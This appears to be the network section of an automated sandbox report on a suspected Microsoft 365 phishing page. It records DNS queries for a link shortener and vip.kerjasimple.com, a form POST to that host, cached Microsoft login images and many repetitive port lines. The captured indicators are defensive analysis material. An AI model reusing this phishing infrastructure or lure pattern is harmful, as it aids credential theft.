      Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficDNS traffic detected: DNS query: t.ly
      Source: global trafficDNS traffic detected: DNS query: vip.kerjasimple.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknownHTTP traffic detected: POST /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N HTTP/1.1Host: vip.kerjasimple.comConnection: keep-aliveContent-Length: 139134Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://vip.kerjasimple.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=5f71965d2c5dc4b3564f21c2f63a98cd
      Source: chromecache_71.2.dr, chromecache_68.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
      Source: chromecache_71.2.dr, chromecache_68.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
      Source: chromecache_72.2.drString found in binary or memory: https://fontawesome.com
      Source: chromecache_72.2.drString found in binary or memory: https://fontawesome.com/license/free
      Source: chromecache_71.2.dr, chromecache_68.2.drString found in binary or memory: https://google.com
      Source: chromecache_70.2.dr, chromecache_53.2.drString found in binary or memory: https://i.imgur.com/xA8aaXN.png
      Source: chromecache_71.2.dr, chromecache_68.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
      Source: chromecache_68.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
